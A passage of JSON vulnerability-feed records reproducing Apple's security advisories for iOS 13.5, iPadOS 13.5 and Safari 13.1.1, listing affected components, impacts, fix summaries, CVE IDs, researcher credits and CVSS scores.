acknowledge Lei Sun for their assistance.\n\n**IOHIDFamily**\n\nWe would like to acknowledge Andy Davis of NCC Group for their assistance.\n\n**IPSec**\n\nWe would like to acknowledge Thijs Alkemade of Computest for their assistance.\n\nEntry added August 10, 2020\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Jeffball of GRIMM and Luke Walker of Manchester Metropolitan University for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 02, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-20T00:00:00", "type": "apple", "title": "About the security content of iOS 13.5 and iPadOS 13.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512", "CVE-2019-20503", "CVE-2020-3878", "CVE-2020-6616", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9791", "CVE-2020-9792", "CVE-2020-9794", "CVE-2020-9795", "CVE-2020-9797", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9808", "CVE-2020-9809", "CVE-2020-9811", "CVE-2020-9812", "CVE-2020-9813", "CVE-2020-9814", "CVE-2020-9815", "CVE-2020-9816", "CVE-2020-9818", "CVE-2020-9819", "CVE-2020-9820", "CVE-2020-9821", "CVE-2020-9823", "CVE-2020-9825", "CVE-2020-9826", "CVE-2020-9827", "CVE-2020-9829", "CVE-2020-9830", "CVE-2020-9835", "CVE-2020-9837", "CVE-2020-9838", "CVE-2020-9839", "CVE-2020-9842", "CVE-2020-9843", "CVE-2020-9844", "CVE-2020-9848", "CVE-2020-9850", "CVE-2020-9852", "CVE-2020-9854", "CVE-2020-9994"], "modified": "2020-05-20T00:00:00", "id": "APPLE:7896F4A93FD5FD018CC9D732F6694D33", "href": "https://support.apple.com/kb/HT211168", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:35", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 13.5 and iPadOS 13.5\n\nReleased May 20, 2020\n\n**Accounts**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt\n\n**AirDrop**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9826: Dor Hadad of Palo Alto Networks\n\n**AppleMobileFileIntegrity**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application could interact with system processes to access private information and perform privileged actions\n\nDescription: An entitlement parsing issue was addressed with improved parsing.\n\nCVE-2020-9842: Linus Henze (pinauten.de)\n\n**Audio**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Audio**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An issue existed with the use of a PRNG with low entropy. This issue was addressed with improved state management.\n\nCVE-2020-6616: J\u00f6rn Tillmanns (@matedealer) and Jiska Classen (@naehrdine) of Secure Mobile Networking Lab\n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9838: Dennis Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab\n\n**CoreText**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam\u2019s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com\n\n**FaceTime**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A user\u2019s video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing\n\nDescription: An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic.\n\nCVE-2020-9835: Olivier Levesque (@olilevesque)\n\n**File System**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to modify the file system\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9820: Thijs Alkemade of Computest\n\n**FontParser**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**IPSec**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9837: Thijs Alkemade of Computest\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to determine another application's memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2020-9797: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9811: Tielei Wang of Pangu Lab\n\nCVE-2020-9812: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-9813: Xinru Chi of Pangu Lab\n\nCVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9809: Benjamin Randazzo (@____benjamin)\n\n**libxpc**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to overwrite arbitrary files\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-9994: Apple\n\nEntry added September 21, 2020\n\n**Mail**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted mail message may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2020-9819: ZecOps.com\n\n**Mail**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9818: ZecOps.com\n\n**Messages**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Users removed from an iMessage conversation may still be able to alter state\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-9823: Suryansh Mansharamani, student of Community Middle School, Plainsboro, New Jersey\n\n**Notifications**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A person with physical access to an iOS device may be able to view notification contents from the lockscreen\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2020-9848: Nima\n\n**rsync**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to overwrite existing files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2014-9512: gaojianfeng\n\nEntry added July 28, 2020\n\n**Sandbox**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2020-9825: Sreejith Krishnan R (@skr0x1C0)\n\n**Security**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2020-9854: Ilias Morad (A2nkF)\n\nEntry added July 28, 2020\n\n**SQLite**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**System Preferences**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**USB Audio**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A USB device may be able to cause a denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9792: Andy Davis of NCC Group\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebRTC**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2019-20503: Natalie Silvanovich of Google Project Zero\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A double free issue was addressed with improved memory management.\n\nCVE-2020-9844: Ian Beer of Google Project Zero\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9830: Tielei Wang of Pangu Lab\n\nEntry added August 10, 2020\n\n\n\n## Additional recognition\n\n**Bluetooth**\n\nWe would like to acknowledge Maximilian von Tschirschnitz (@maxinfosec1) of Technical University Munich and Ludwig Peuckert of Technical University Munich for their assistance.\n\n**CoreText**\n\nWe would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance.\n\n**Device Analytics**\n\nWe would like to acknowledge Mohamed Ghannam (@_simo36) for their assistance.\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**IOHIDFamily**\n\nWe would like to acknowledge Andy Davis of NCC Group for their assistance.\n\n**IPSec**\n\nWe would like to acknowledge Thijs Alkemade of Computest for their assistance.\n\nEntry added August 10, 2020\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Jeffball of GRIMM and Luke Walker of Manchester Metropolitan University for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n", "edition": 9, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-21T04:30:51", "title": "About the security content of iOS 13.5 and iPadOS 13.5 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9827", "CVE-2014-9512", "CVE-2020-9792", "CVE-2020-9837", "CVE-2020-9791", "CVE-2020-9803", "CVE-2020-9844", "CVE-2020-9819", "CVE-2020-9852", "CVE-2020-9854", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9826", "CVE-2020-9812", "CVE-2020-3878", "CVE-2020-6616", "CVE-2020-9839", "CVE-2020-9848", "CVE-2020-9795", "CVE-2020-9813", "CVE-2020-9821", "CVE-2020-9802", "CVE-2020-9809", "CVE-2020-9820", "CVE-2020-9800", "CVE-2020-9838", "CVE-2020-9842", "CVE-2020-9815", "CVE-2020-9790", "CVE-2020-9830", "CVE-2020-9825", "CVE-2020-9850", "CVE-2020-9829", "CVE-2020-9807", "CVE-2020-9808", "CVE-2020-9811", "CVE-2020-9843", "CVE-2020-9814", "CVE-2020-9816", "CVE-2020-9789", "CVE-2020-9835", "CVE-2020-9797", "CVE-2020-9794", "CVE-2020-9823", "CVE-2020-9994", "CVE-2019-20503", "CVE-2020-9818"], "modified": "2020-09-21T04:30:51", "id": "APPLE:HT211168", "href": "https://support.apple.com/kb/HT211168", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:06", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## Safari 13.1.1\n\nReleased May 26, 2020\n\n**Safari**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: A malicious process may cause Safari to launch an application\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9801: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n**WebRTC**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2019-20503: Natalie Silvanovich of Google Project Zero\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-27T12:42:27", "title": "About the security content of Safari 13.1.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9801", "CVE-2020-9802", "CVE-2020-9800", "CVE-2020-9850", "CVE-2020-9807", "CVE-2020-9843", "CVE-2019-20503"], "modified": "2020-05-27T12:42:27", "id": "APPLE:HT211177", "href": "https://support.apple.com/kb/HT211177", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T22:12:13", "description": "# About the security content of Safari 13.1.1\n\nThis document describes the security content of Safari 13.1.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## Safari 13.1.1\n\nReleased May 26, 2020\n\n**Safari**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: A malicious process may cause Safari to launch an application\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9801: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n**WebRTC**\n\nAvailable for: macOS Mojave and macOS High Sierra, and included in macOS Catalina\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2019-20503: natashenka of Google Project Zero\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 02, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 